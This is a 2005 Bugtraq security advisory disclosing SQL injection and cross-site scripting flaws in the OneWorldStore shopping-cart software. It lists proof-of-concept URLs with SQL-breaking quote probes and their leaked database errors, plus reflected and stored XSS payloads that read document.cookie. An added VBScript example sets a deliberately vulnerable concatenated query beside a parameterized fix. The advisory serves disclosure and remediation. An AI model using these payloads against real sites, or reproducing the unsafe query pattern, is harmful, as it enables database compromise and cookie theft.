
List:       bugtraq
Subject:    Multiple multiple sql injection/errors and xss vulnerabilities in
From:       dcrab <dcrab () hackerscenter ! com>
Date:       2005-04-14 18:31:17
Message-ID: 20050414183117.2562.qmail () www ! securityfocus ! com

Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple multiple sql injection/errors and xss vulnerabilities in OneWorldStore
Date: 14/04/2005

Vendor: OneWorldStore
Vendor Website: http://www.oneworldstore.com
Summary: There are multiple SQL injection (with verbose SQL error disclosure) and XSS vulnerabilities in OneWorldStore.


Proof of Concept Exploits:

http://example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT stock FROM Products WHERE idProduct = 'SQL_INJECTION
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owBasket/owAddItem.asp, line 48


http://example.com/owListProduct.asp?bSpecials='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM Categories WHERE idCategory = AND Active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owListProduct.asp, line 50


http://example.com/owListProduct.asp?idCategory='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM Categories WHERE idCategory = ''SQL AND Active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owListProduct.asp, line 50


http://example.com/owProductDetail.asp?idproduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owProductDetail.asp, line 647


http://example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owProductDetail.asp, line 647


http://example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab
Pops Cookie


http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64
Pops Cookie


http://example.com/owProductDetail.asp
Submitting the review form with something like
Name: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Email: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E@'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.com
Rating: 5
Comment: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

would cause long-lasting, permanent XSS and steal the cookies of anyone who visited the webpage.


Possible Fixes: The usage of htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.
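The pages named above are classic ASP over ADODB (the 800a0e78 errors come from ADODB.Recordset), so the PHP/MySQL functions listed in the fix have no direct counterpart there; the ADODB equivalents are typed query parameters and Server.HTMLEncode on output. The following is an added illustration of both, not code from the advisory or from OneWorldStore: it assumes an open ADODB.Connection named conn, takes the Products/idProduct/stock names from the query leaked in the first PoC, and assumes idProduct is an integer column (the advisory does not say).

```vbscript
<%
' Added illustration, not OneWorldStore code. Assumes an open
' ADODB.Connection named conn; ADO constants are written as literals
' (adCmdText = 1, adInteger = 3, adParamInput = 1) so no adovbs.inc is needed.
' Table and column names come from the query leaked in the first PoC.

' Vulnerable pattern: the raw request value is concatenated into the SQL
' text. A lone ' breaks the quoting, which is exactly the 800a0e78 error
' the advisory shows, and a crafted value changes the query that runs.
Function GetStockUnsafe(conn)
    Dim sql, rs
    sql = "SELECT stock FROM Products WHERE idProduct = '" & Request("idProduct") & "'"
    Set rs = Server.CreateObject("ADODB.Recordset")
    rs.Open sql, conn
    If Not rs.EOF Then GetStockUnsafe = rs("stock")
    rs.Close
End Function

' Hardened pattern: reject anything that is not numeric (idProduct is
' assumed to be an integer column; a text column would be bound as
' adVarChar = 200 with a length instead), then bind the value as a typed
' parameter so the database never parses it as SQL.
Function GetStockSafe(conn, rawId)
    Dim cmd, rs
    GetStockSafe = Null
    If Not IsNumeric(rawId) Then Exit Function
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = 1                      ' adCmdText
    cmd.CommandText = "SELECT stock FROM Products WHERE idProduct = ?"
    cmd.Parameters.Append cmd.CreateParameter("idProduct", 3, 1, , CLng(rawId)) ' adInteger, adParamInput
    Set rs = cmd.Execute
    If Not rs.EOF Then GetStockSafe = rs("stock")
    rs.Close
End Function

' Output side: every reflected value goes through Server.HTMLEncode, which
' turns the "><script>alert(document.cookie)</script> probes aimed at
' sName, sEmail and bSub into inert text. The same applies to the stored
' review fields (Name, Email, Comment) when they are rendered later.
Dim stock
stock = GetStockSafe(conn, Request.QueryString("idProduct"))
If IsNull(stock) Then
    Response.Write "<p>Unknown product.</p>"
Else
    Response.Write "<p>Stock: " & Server.HTMLEncode(CStr(stock)) & "</p>"
End If
%>
```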

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon-to-come-out book on Secure coding with php.

